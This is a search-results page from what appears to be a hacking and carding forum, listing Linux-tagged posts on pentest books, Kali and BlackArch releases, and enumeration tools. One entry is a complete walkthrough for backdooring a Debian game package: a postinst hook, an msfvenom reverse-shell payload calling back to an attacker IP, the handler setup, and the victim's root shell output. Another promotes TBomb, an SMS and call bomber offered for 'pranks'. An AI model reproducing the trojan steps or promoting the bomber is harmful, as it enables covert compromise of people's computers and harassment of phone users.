Search the Community

Showing results for tags 'linux'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
    • Moderators
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
  • Security & Anonymity
  • Operating Systems | Hardware | Programs
  • Graphic Design
  • vBCms Comments
  • live stream tv
  • Marketplace
  • Premium Accounts
  • Modders Section
  • PRIV8-Section
  • Cracking Zone PRIV8
  • Carding Zone PRIV8

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

Found 100 results

  1. Mastering Kali Linux for Advanced Penetration Testing Secure your network with Kali Linux 2019.1 – the ultimate white hat hackers' toolkit, 3rd Edition A practical guide to testing your infrastructure security with Kali Linux, the preferred choice of pentesters and hackers Key Features Employ advanced pentesting techniques with Kali Linux to build highly secured systems Discover various stealth techniques to remain undetected and defeat modern infrastructures Explore red teaming techniques to exploit secured environment Book Description This book takes you, as a tester or security practitioner, through the reconnaissance, vulnerability assessment, exploitation, privilege escalation, and post-exploitation activities used by pentesters. To start with, you'll use a laboratory environment to validate tools and techniques, along with an application that supports a collaborative approach for pentesting. You'll then progress to passive reconnaissance with open source intelligence and active reconnaissance of the external and internal infrastructure. You'll also focus on how to select, use, customize, and interpret the results from different vulnerability scanners, followed by examining specific routes to the target, which include bypassing physical security and the exfiltration of data using a variety of techniques. You'll discover concepts such as social engineering, attacking wireless networks, web services, and embedded devices. Once you are confident with these topics, you'll learn the practical aspects of attacking user client systems by backdooring with fileless techniques, followed by focusing on the most vulnerable part of the network – directly attacking the end user. By the end of this book, you'll have explored approaches for carrying out advanced pentesting in tightly secured environments, understood pentesting and hacking techniques employed on embedded peripheral devices. What you will learn Configure the most effective Kali Linux tools to test infrastructure security Employ stealth to avoid detection in the infrastructure being tested Recognize when stealth attacks are being used against your infrastructure Exploit networks and data systems using wired and wireless networks as well as web services Identify and download valuable data from target systems Maintain access to compromised systems Use social engineering to compromise the weakest part of the network - the end users Who this book is for This third edition of Mastering Kali Linux for Advanced Penetration Testing is for you if you are a security analyst, pentester, ethical hacker, IT professional, or security consultant wanting to maximize the success of your infrastructure testing using some of the advanced features of Kali Linux. Prior exposure of penetration testing and ethical hacking basics will be helpful in making the most out of this book. About this book 325Pages 6 - 7Hours to read 88kTotal words [Hidden Content]
  2. [Hidden Content]
  3. Kali Linux – An Ethical Hacker’s Cookbook, 2nd Edition ($44.99 Value) FREE for a Limited Time Discover end-to-end penetration testing solutions to enhance your ethical hacking skills Many organizations have been affected by recent cyber events. At the current rate of hacking, it has become more important than ever to pentest your environment in order to ensure advanced-level security. This book is packed with practical recipes that will get you off to a strong start by introducing you to the installation and configuration of Kali Linux, which will help you to perform your tests. You will also learn how to plan attack strategies and perform web application exploitation using tools such as Burp and JexBoss. Delve into the technique of carrying out wireless and password attacks as well as the wide range of tools that help in forensic investigations and incident response mechanisms. Practical recipes to conduct effective penetration testing using the latest version of Kali Linux Leverage tools like Metasploit, Wireshark, Nmap, and more to detect vulnerabilities with ease Confidently perform networking and application attacks using task-oriented recipes [HIDE][Hidden Content]]
  4. Termux Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager. [Hidden Content] Secure. Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution. Feature packed. Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox. Access API endpoints with curl and use rsync to store backups of your contact list on a remote server. Customizable. Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles? Explorable. Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux - install man pages on your phone and read them in one session while experimenting with them in another. With batteries included. Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby and Node.js are all available. Ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to - Termux supports keyboard shortcuts and has full mouse support. Tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and strace are available if you get stuck and need to debug. [Hidden Content]
  5. TBomb v1.7b An open-source SMS/call bomber for Linux And Termux. Note: The script requires working network connection to work. No balance will be deducted for using this script to send SMS/calls. While doing infinite bombing use 2-3 seconds delay and 10 to 20 threads for maximum performance. Don't put spaces in between phone number (Ex- 99999 99999) Make sure you are using the latest version of TBomb Make sure you are using Python v3. Here's how you can check it. Type this command in your terminal. $ python -V If output looks like Python 3 - Congrats, Python 3 is installed properly. Do not use this to harm others. This script is only for educational purposes or to prank. None of the developers/contributors are responsible for the misuse of TBomb. Features: Lots of integrated SMS/call APIs Unlimited and super-fast bombing International bombing available Call bombing Frequent updates Automatic updating mechanism Easy to use and embed in code Usage: Run these commands to run TBomb [HIDE][Hidden Content]]
  6. itsMe

    BlackArch Linux 2020.01.01

    BlackArch Linux 2020.01.01 Releases: Linux kernel 5.4.6, added more than 120 new tools BlackArch Linux is an Arch Linux-based penetration testing distribution for penetration testers and security researchers. The repository contains 2428 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs. BlackArch Linux is an open-source distribution of Linux derived from the lightweight and powerful Arch Linux operating system and designed from the ground up to be used by security professionals for penetration testing tasks. ChangeLog 2020.01.01: added 120 new tools add terminus font support to lxdm fixed the annoying ‘cannot open tools via menu blah blah *crying*’ bug updated blackarch-installer to v1.1.34 included Linux kernel 5.4.6 updated urxvt config: add support for changing size on the fly vim: replace pathogen with Vundle.vim. added new vim plugin: clang_complete minor bugfixes and improvements QA’ed and fixed all packages (runtime exec). updated all blackarch tools and packages including config files updated all system packages updated all window manager menus (awesome, Fluxbox, Openbox) [HIDE][Hidden Content]]
  7. dEEpEst

    Run Linux inside Windows

    [Hidden Content]
  8. Metasploiter

    Windows Subsystem for Linux x-server

    get x410 from windows app store then create a .bat file start /B x410.exe /desktop kali.exe run "if [ -z \"$(pidof xfce4-session)\" ]; then export DISPLAY=127.0.0.1:0.0; xfwm4& xfce4-session; pkill '(gpg|ssh)-agent'; fi;" then create short cute %windir%\system32\cmd.exe /C "Path\Kali Linux.bat"
  9. 0x1

    Acunetix Linux V.1905

    Acunetix Linux Version 190515149 Improve Your Web Application Security with the Acunetix Vulnerability Scanner Acunetix is not just a web vulnerability scanner. It is a complete web application security testing solution that can be used both standalone and as part of complex environments. It offers built-in vulnerability assessment and vulnerability management, as well as many options for integration with market-leading software development tools. By making Acunetix one of your security measures, you can significantly increase your cybersecurity stance and eliminate many security risks at a low resource cost. Download && More info [Hidden Content]
  10. dEEpEst

    Kali Linux 2019.4 Release

    We are incredibly excited to announce our fourth and final release of 2019, Kali Linux 2019.4, which is available immediately for download. 2019.4 includes some exciting new updates: A new default desktop environment, Xfce New GTK3 theme (for Gnome and Xfce) Introduction of “Kali Undercover” mode Kali Documentation has a new home and is now Git powered Public Packaging – getting your tools into Kali Kali NetHunter KeX – Full Kali desktop on Android BTRFS during setup Added PowerShell The kernel is upgraded to version 5.3.9 … Plus the normal bugs fixes and updates. New Desktop Environment and GTK3 Theme There are a ton of updates to go over for this release, but the most in your face item that everyone is going to notice first are the changes to the desktop environment and theme. So let’s cover that first. An update to the desktop environment has been a long time coming. We have been talking about how to address this, what we wanted to do, experimenting on different approaches, and so on for months now. As a summary we had a few issues we wanted to address head-on: Performance issues – Gnome is a fully-featured desktop environment with a ton of awesome things it can do. But all these features comes with overhead, often overhead that is not useful for a distribution like Kali. We wanted to speed things up, and have a desktop environment that does only what it’s needed for, and nothing else. Gnome has been overkill for most Kali users, as many just want a window manager that allows you to run multiple terminal windows at once, and a web browser. Fractured user experience – We support a range of hardware, from the very high end to the very low. Because of this, traditionally our lower-end ARM builds have had a completely different UI than our standard. That’s not optimal, and we wanted to unify this experience so it did not matter if you were running on a bare metal install on a high end laptop or using a Raspberry Pi, the UI should be the same. Modern look – We have been using the same UI for quite a while now, and our old theme maintainer had moved on due to lack of time. So we wanted to go with something fresh, new, and modern. To help us address these items, we tracked down Daniel Ruiz de Alegría and started the development of a new theme running on Xfce. Why Xfce? After reviewing the above issues, we felt that Xfce addressed them best while still being accessible to the majority of users. The solution we’ve committed to is lightweight and can run on all levels of Kali installs. It is functional in that it handles the various needs of the average user with no changes. It is approachable where it uses standard UI concepts we are all familiar with to ensure there is no learning curve. And it looks great with modern UI elements that make efficient use of screen space. We are really excited about this UI update, and we think you are going to love it. However, as UI can be a bit like religion, if you don’t want to leave Gnome don’t worry. We still have a Gnome build for you, with a few changes already in place. As time goes by, we will be making changes to all of the desktop environments we release installs to get them “close” to a similar user experience no matter what DE you run. There will be limits to this, as we don’t have the resources to heavily invest in tweaking all these different environments. So if there is something you would like to see, feel free to submit a feature request! We have also released a FAQ about the new theme that you can find on our docs page. This includes some common items like how to switch to the theme on your existing install, how to change off of it if you don’t like it, and so on. Kali Undercover With the change to the environment, we thought we would take a side step and do something fun. Thanks to Robert, who leads our penetration testing team, for suggesting a Kali theme that looks like Windows to the casual view, we have created the Kali Undercover theme. Say you are working in a public place, hacking away, and you might not want the distinctive Kali dragon for everyone to see and wonder what it is you are doing. So, we made a little script that will change your Kali theme to look like a default Windows installation. That way, you can work a bit more incognito. After you are done and in a more private place, run the script again and you switch back to your Kali theme. Like magic! Kali-Docs is now on Markdown and new home (/docs/) This may not be as flashy as the new theme, but the changes to the docs we have done is just as significant. One of our go-forward goals with Kali is to move more of the development into the public and make it as easy as possible for anyone (that means you!) to get involved and contribute to Kali. That’s what our move to GitLab earlier in the year was all about. Another part of this is changing how we deal with docs. We have since moved all of our documentation into Markdown in a public Git repository. From here on out anyone, not just Kali staff, can contribute to better documentation through merge requests. We will still approve any content changes, but once merged, changes will be automatically available on the docs section of our website. We encourage everyone to get involved! If you see something wrong in the existing docs, change it! If you have an idea for new docs, write it! These sorts of contributions make Kali better for everyone. This is just the first step. With this change in place, coming soon watch for a kali-docs package in Kali that gives you full offline access to the documentation on every install of Kali. Perfect for those situations where you are working in a closed-off environment with no Internet access. Public Packaging One of the more significant new documents we have done is documenting how you can make a new package that will get included in Kali. One of the most common bug reports is requests for us to add new tools or update existing ones. Oftentimes, by the tool developers themselves as they recognize that having their tool in the Kali repo is the easiest distribution channel for security assessment tools there is. The volume of this has always been difficult to keep up with, and we have to make some hard decisions on where to commit our limited resources. Now with this work-flow in place and documented, you don’t have to wait on us. Go ahead and package up your tool and submit it off to us for approval. This is an awesome way to get involved with improving Kali. BTRFS during setup Another significant new addition to the documentation is the use of BTRFS as your root file system. This is an amazing approach documented by Re4son, that when done gives you the ability to do file system rollbacks after upgrades. When you are in a VM and about to try something new, you will often take a snapshot in case things go wrong you can easily go back to a known-good state. However, when you run Kali bare metal that’s not so easy. So you end up being extra careful, or if things go wrong have a lot of manual clean up to do. With BTRFS, you have this same snapshot capability on a bare metal install! As this is new, it’s not integrated into our installer yet. Once we get some feedback on how it’s working for everyone, the next step is to streamline this and make it an easier option in our installer. So if you try it out, be sure to let us know how it works for you! PowerShell On to other features, in case you missed it PowerShell is now in Kali (We have a blog post about it). This has been really great to bring the ability to execute PowerShell scripts directly on Kali. NetHunter Kex – Full Kali Desktop on Android phones Another feature we are super excited about is the introduction of NetHunter Kex. In a nutshell, this allows you to attach your Android device to an HDMI output along with Bluetooth keyboard and mouse and get a full, no compromise, Kali desktop. Yes. From your phone. We had a live Penetration Testing with Kali course we were teaching, and NetHunter Kex was just in a beta stage. So we wanted to really push the limits. So, in the live course, what we did was attach a USB-C hub to our OnePlus7. This gave us HDMI and Ethernet access. We attached the HDMI to the projector and used a bluetooth keyboard/mouse. With this, we were able to do an entire PWK module from the phone. This is a feature you have to see to believe. Until you experience it, you won’t fully understand what this provides. With a strong enough phone, this is very similar to using a nice full-featured portable ARM desktop that happens to fit in your pocket. The possible ways you can leverage this in assessments is huge. To get a full breakdown on how to use NetHunter Kex, check out our docs at. ARM 2019.4 is the last release that will support 8GB sdcards on ARM. Starting in 2020.1, a 16GB sdcard will be the minimum we support. You will always be able to create your own image that supports smaller cards if you desire. RaspberryPi kernel was updated to 4.19.81, and the firmware package was updated to include the eeprom updates for the RaspberryPi 4. During the release testing, a limited number of devices were not showing the Kali menu properly. This was not critical enough to delay the release, so instead as a work-around you can run the following command to display the menu correctly: apt update && apt dist-upgrade Once this completes, log out, so you’re back at the login manager. Then switch to a console via CTRL+ALT+F11 (on the Chromebooks this is the key pointing left next to the ESC key). Login and then run: rm -rf .cache/ .config/ .local/ && sync && reboot After reboot, the menu will have the correct entries. We’re still looking into why it occurs on only some of the images. Download Kali Linux 2019.4 So what are you waiting for? Start the download now! Also, just to mention we do also produce weekly builds that you can use as well. If it’s been some time since our last release and you want the latest packages you don’t have to go off our latest release and update. You can just use the weekly image instead, and have fewer updates to do. Just know these are automated builds that we don’t QA like we do our standard release images. If you already have an existing Kali installation, remember you can always do a quick update: [email protected]:~# cat </etc/apt/sources.list deb [Hidden Content] kali-rolling main non-free contrib EOF [email protected]:~# [email protected]:~# apt update && apt -y full-upgrade [email protected]:~# [email protected]:~# [ -f /var/run/reboot-required ] && reboot -f If you want to switch to our new Xfce: [email protected]:~# apt -y install kali-desktop-xfce You should now be on Kali Linux 2019.4. We can do a quick check by doing: [email protected]:~# grep VERSION /etc/os-release VERSION="2019.4" VERSION_ID="2019.4" VERSION_CODENAME="kali-rolling" [email protected]:~# [email protected]:~# uname -v #1 SMP Debian 5.3.9-3kali1 (2019-11-20) [email protected]:~# [email protected]:~# uname -r 5.3.0-kali2-amd64 [email protected]:~# NOTE: The output of “uname -r” may be different depending on architecture. As always, should you come across any bugs in Kali, please submit a report on our bug tracker. We’ll never be able to fix what we don’t know about.
  11. x_h0rr0r_x

    Demon Linux

    I have been using this for a while now. Great light Distro What is Demon Linux? Demon linux us an information security-themed distribution of Debian Linux. It has taken the place of WeakNet Linux with a whole new design, UI/UX, tool-set, and more. The project is approriately named, considering that it came from my own frustrations with how poorly designed user interfaces are and how terrible most user experiences in software are becoming more prevalent. I want a beautiful experience that is also user friendly. The Desktop The new desktop environment, which replaces Fluxbox, is build from XFCE. The choice came from simply going through the many "lightweight" desktop-environments (window managers) available for Linux and XFCE was smooth and worked without any vague, noisy and annoying, panel, screen resolution, or menu errors and warnings like Cinnamon/Budgie did. For the Penetration Tester It comes in an easy-on-the-eyes dark theme, the UI is easy to understand and use, and comes pre-packed with tons of tools that you will need during your penetration testing and CTF exercises. I built these tools into the distribution with specific configurations that I personally use for red team practice with HackTheBox.eu, VulnHUB, and other resources. You can find many tools outside of the usual $PATH in my own area /infosec. Tolls will be considered and added on a first come basis. If you'd like to see tools added, please request them through my new Demon App Store. For the Developer Demon Linux is great for developing software. In fact, the Demon App Store has many IDEs and developer tools to install instantly. The Menu The new menu for the desktop environment beats what I had made for Fluxbox for miles. Simply hit the WIN/SUPER key on your keyboard and start typing what you want to open/search for. Aleternatively, you can hit WINDOWS+s for the main menu without search. The Dock I decided to go with the default XFCE dock and scrap my old wbar-fork I made for WeakNet LINUX. This is simply because I like to intuitive design of the dock. I still got to make pretty icons for some of the most commonly used tools in the distribution. If you would like to add more, you can use the default, Papirus-Dark icons, or my own custom in /usr/share/demon/images/icons/ The Browser I realize that I spend a lot of time in a web browser during penetration testing. Either by trying to gain a foothold in a box through a web application, researching for exploits and vulnerabilties, or simply listening to Spotify. With this in mind, and how the browser really should integrate with desktop environment in a cooperative manner, I decided to go with Firefox for this distribution and ditch Google Chrome. Firefox has a lot of great infosec-related plugins that I have added right into the distribution for you. The famous Hack Tools panel is now integrated with the developer-tools - simply hit F12 and you'll see the HackBar tab on the bottom right. I have also created a TOR and BurpSuite entrie for FoxyProxy Basic. Session Management Penetration testing and CTF takes a long time. Espcially if you are constantly TRYING HARDER. Taking breaks is essential and protecting your screen, session, and data is even more essential. This distro comes with a login/log out session manager called LightDM. Remember, the default username and passord for The Demon are, root:weaknet. Change the password as soon as you install The Demon onto a virtual disk using the installer. Reporting Quickly take screenshots or record your desktop using the quick access menu icons on the top right of the panel. The Tools This distribution comes packed with all of the tools that you should need while doing your basic CTF, or Penetration Test exercises. If you find a tool that you use daily missing from the distribution, request to have them added to my Demon App Store. Some of the categories of tools for this distribution include, Penetration Testing / offensive information security Capture the flag (CTF) Digital Forensics Encryption and Data Protection These tools have been moved from /pwnt to /infosec Support This distribution has a lot of built in support with firmwares and drivers for a wide array of hacking devices, including WiFi adapters, Bluetooth sniffers, and more. Below is a screenshot of the plug-and-play capabilities of the $20 Adafruit Bluetooth LE Friend - Simply plug it in, install "Bluefruit" from the Demon App Store, and run bluefruit_sniffer.sh 802.11 Band Spectrum Analysis? The Demon has that too! Check out the support for the Ubiquiti Airview 2 device - just plug and play! 802.11 USB Devices? I use ALFA devices because the USB support in VMWare is incredible. Here are two different ALFA devices with two different chipsets, RTL8187 and Atheros ath9k, running side by side in Demon Linux, Installation Demon Linux was built with my own custom-made tools and scripts which are available on my GitHUB page from the link in the navigation bar. The installer is still in the "experimental" phase, as I had to heavily rewrite what I had for older versions of Debian, so if you come into issues, I would like to know so that I can resolve them. I will be tracking issues with the installer at my GitHUB page, so please file the issue here at my GitHUB page. 2019 | [email protected] | Douglas Berdeaux
  12. Udemy Learn Kali Linux and Hack Android Mobile devices Penetration Testing Setup Your Lab Finding Your Way Around Kali Important Tools Exploitation Hacking Android devices Social Engineering Hacking using Android devices Remote attacks On Android Download: [Hidden Content] Pass: [Hidden Content]
  13. Using Old Windows Symbols with Ghidra in Linux Recently, while developing course material for a reverse engineering course I was making, I needed to get the symbols for the venerable sol.exe. Unfortunately the world’s greatest solitaire program is no longer shipped with windows, and subsequently Microsoft’s symbol servers have stopped providing debug information for it. The last complication was Ghidra’s support for PDB is limited to Windows only systems. This guide will walk through how I got the symbols for an unsupported OS (XP) working inside of the Ghidra Linux client. [Hidden Content]
  14. This Metasploit module exploits an issue in ptrace_link in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. View the full article
  15. dEEpEst

    USB Stealer Linux OS

    Well this USB stealer is not the same as in Windows OS, because on Linux you don't have permission to run scripts direct from USB. That's why you would need to copy script from USB to desktop for example, give permission to it and then just run the script! [Hidden Content]
  16. 0x1

    Postenum

    Postenum is a clean, nice and easy tool for basic/advanced privilege escalation vectors/techniques. Postenum tool is intended to be executed locally on a Linux box. Be more than a normal user. be the ROOT. USE : ./postenum.sh [option] ./postenum.sh -s ./postenum.sh -c Options : -a : All -s : Filesystem [SUID, SGID, Config/DB files, etc.] -l : Shell escape and development tools -c : The most interesting files -n : Network settings -p : Services and cron jobs -o : OS informations and kernel exploits -v : Software's versions -t : Fstab credentials and databases checker Version 0.8 Download: [Hidden Content]
  17. Complete Kali Linux Tutorial,Complete penetration testing training,Learn Hacking Created by Vishal Patel English What Will I Learn? Footprinting,Scanning,Enumeration,System Hacking,Trojan and Backdoors,Viruses and worms,Denial-of-service,Sniffing,Session Hijacking,Wireless Hacking,Firewall,IDS,Honeypots,Buffer Overflows,Penetration Testing,Cryptography Requirements Basic IT Skill Internet Users You will gain a comprehensive understanding of vulnerability assessment and the tools used in this process. What kind of security measures do you take to protect your facilities, equipment, resources, personnel, and property from damage caused by unauthorized access? In this course, Physical Security, these are questions that we will be answering. Footprinting is the gathering of information related to a particular computer and its users and systems. Reconnaissance is an exploration that is conducted to gain information. Network scanning is the scanning of public or private networks to find out which systems are running, their IP addresses, and which services they are running. In Port Scanning, you will learn how ports can be scanned, how a hacker can break into your network through the ports, and the countermeasures you can take to protect your device or network. Banner grabbing is a technique used to grab information about computer systems on a network and the services running its open ports. In this course you will be introduced to enumeration and the many different uses it has in computer systems. This course will include demos on the different tools and uses of enumeration. In this course you will be learning the fundamentals of Linux. We will be pairing this course with demos with a more in-depth look into some of the fundamentals and tools of Linux. Pentesting is an attack on a system in hopes of finding security weaknesses. In the course Configuring Linux for Pentesting, you will be learning the steps to configure Linux for pentesting and tools used for pentesting on a Linux system. Whenever we login to a computer system, we provide information to identify ourselves. We refer to this as authentication. Ensure that you know everything involved in securing a Windows system against attack. During this course you’ll get into Windows passwords — how they’re created, how they’re stored, and different methods used to crack them. You will take a good look at spyware, the activities it performs, different types of spyware, and the countermeasures needed in order to prevent hackers from utilizing these types of techniques against your company. You will also spend time studying different types of keyloggers. There are three different types of keyloggers that we see used in today’s environments: hardware, software, and kernel/driver keyloggers. Covering Tracks will be going over various ways that attackers have at their disposal to cover any tracks that may lead to their unwanted eviction, or worse yet, to an audit trail that would lead directly back to them. Trojans and Backdoors is the course where our software is going to be going undercover. You will discover what viruses and worms are and how they can infect computers and systems. Sniffers is our course where we take a look at Network Sniffing. Social engineering is the art of extorting employees for information. Become familiar with the following concepts: denial-of-service, distributed denial-of-service, and how the denial-of-service and distributed denial-of-service attacks take place. In the course Session Hijacking, you will learn details about session hijacking, well-known techniques employed by aggressors, the steps involved in session hijacking, various types of session hijacking, tools for hijacking sessions, ways you can protect yourselves from session hijacking, and how pentesting can be used to identify vulnerabilities. Hacking Web and Application Servers, is a course that will give you a good idea about vulnerabilities and attacks available for web servers and web applications. In our course our course Advanced Exploitation Techniques, you will learn what advanced exploitation techniques are and how you can use them in your penetration testing. Who is the target audience? Anyone want to learn how to hack IT Professionals Engineers IT Students Computer Known Network Engineers Internet Users Size: 2.34 GB [torrent file] [HIDE][Hidden Content]]
  18. dEEpEst

    Binary Linux Trojan

    In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Mine Sweeper. [email protected]:~# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... [email protected]:~# mkdir /tmp/evil [email protected]:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil [email protected]:~# cd /tmp/evil/ [email protected]:/tmp/evil# Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added “features”. [email protected]:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work [email protected]:/tmp/evil# mkdir work/DEBIAN In the DEBIAN directory, create a file named control that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (ubuntu[email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. We also need to create a post-installation script that will execute our binary. In our DEBIAN directory, we’ll create a file named postinst that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & Now we’ll create our malicious payload. We’ll be creating a reverse shell to connect back to us named ‘freesweep_scores’. [email protected]:~# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 98 (iteration=0) x86/shikata_ga_nai chosen with final size 98 Payload size: 98 bytes Saved as: /tmp/evil/work/usr/games/freesweep_scores We’ll now make our post-installation script executable and build our new package. The built file will be named work.deb so we will want to change that to freesweep.deb and copy the package to our webroot directory. [email protected]:/tmp/evil/work/DEBIAN# chmod 755 postinst [email protected]:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'. [email protected]:/tmp/evil# mv work.deb freesweep.deb [email protected]:/tmp/evil# cp freesweep.deb /var/www/ If it is not already running, we’ll need to start the Apache web server. [email protected]:/tmp/evil# service apache2 start We will need to set up the Metasploit multi/handler to receive the incoming connection. [email protected]:~# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y" PAYLOAD => linux/x86/shell/reverse_tcp LHOST => 192.168.1.101 LPORT => 443 [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game. [email protected]:~$ wget [Hidden Content] [email protected]:~$ sudo dpkg -i freesweep.deb As the victim installs and plays our game, we have received a shell! [*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129) ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6 inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB) Interrupt:17 Base address:0x1400 ...snip... hostname ubuntu id uid=0(root) gid=0(root) groups=0(root) Source: [HIDE][Hidden Content]]
  19. Udemy Learn Kali Linux and Hack Android Mobile devices Penetration Testing Setup Your Lab Finding Your Way Around Kali Important Tools Exploitation Hacking Android devices Social Engineering Hacking using Android devices Remote attacks On Android [Hidden Content]
  20. itsMe

    Kali Linux 2019.3 Release

    We are pleased to announce that our third release of 2019, Kali Linux 2019.3, is available immediately for download. This release brings our kernel up to version 5.2.9, and includes various new features across the board with NetHunter, ARM and packages (plus the normal bugs fixes and updates). As promised in our roadmap blog post, there are both user facing and backend updates. CloudFlare Kali Linux is Open Source, and Cloudflare hearts Open Source – so it’s a perfect match! As a result, CloudFlare has graciously allowed us to use their content delivery network (CDN) to mirror our repository, allowing us to now distribute our content through them. A more technical breakdown can be found on their blog. We are currently running the CloudFlare services side by side with our standard and community mirrors. If you notice the kali.download domain appearing on screen when you run apt update, this means you’re using CloudFlare’s services. Tool Updates & New Packages As always, we have our updates for all our tools, including (but not limited to): Burp Suite HostAPd-WPE Hyperion Kismet Nmap There is a new tool (and it is included by default), amass, that has been well received in the bug bounty world. [HIDE][Hidden Content]]
  21. BlackArch Linux 2019.09.01 Releases: Linux kernel 5.2.9, added more than 150 new tools BlackArch Linux is an open source distribution of Linux derived from the lightweight and powerful Arch Linux operating system and designed from the ground up to be used by security professionals for penetration testing tasks. The repository contains more than 2050 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs. For more information, see the installation instructions. ChangeLog 2019.09.01: added more than 150 new tools added terminus font for all WMs (thanks to psf for i3-wm bugfixes) included linux kernel 5.2.9 new ~/.vim and ~/.vimrc (thanks to noptrix offering his config files) updated blackarch-installer to v1.1.19 various improvements and bugfixes removed dwm window manager replaced the default terminal xterm with rxvt-unicode updated look&feel: new BlackArch theme for WMs, grub, syslinux, etc. (special thanks to Erik!) QA’ed and fixed all packages (runtime exec). updated all blackarch tools and packages including config files updated all system packages updated all window manager menus (awesome, fluxbox, openbox) [HIDE][Hidden Content]]
  22. 0x1

    Linux Smart Enumeration

    Linux enumeration tool for pentesting and CTFs with verbosity levels Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view. What is it? This script will show relevant information about the security of the local Linux system. It has 3 levels of verbosity so you can control how much information you see. In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system. By default it will ask you some questions: mainly the current user password (if you know it so it can do some additional tests. How to use it? The idea is to get the information gradually. First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with. If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting. If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r. You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro. Use: ./lse.sh [options] OPTIONS -c Disable color -i Non interactive mode -h This help -l LEVEL Output verbosity level 0: Show highly important results. (default) 1: Show interesting results. 2: Show all gathered information. -s SELECTION Comma separated list of sections or tests to run. Available sections: usr: User related tests. sud: Sudo related tests. fst: File system related tests. sys: System related tests. sec: Security measures related tests. ret: Recurren tasks (cron, timers) related tests. net: Network related tests. srv: Services related tests. pro: Processes related tests. sof: Software related tests. ctn: Container (docker, lxc) related tests. Specific tests can be used with their IDs (i.e.: usr020,sud) Source & Download : [Hidden Content]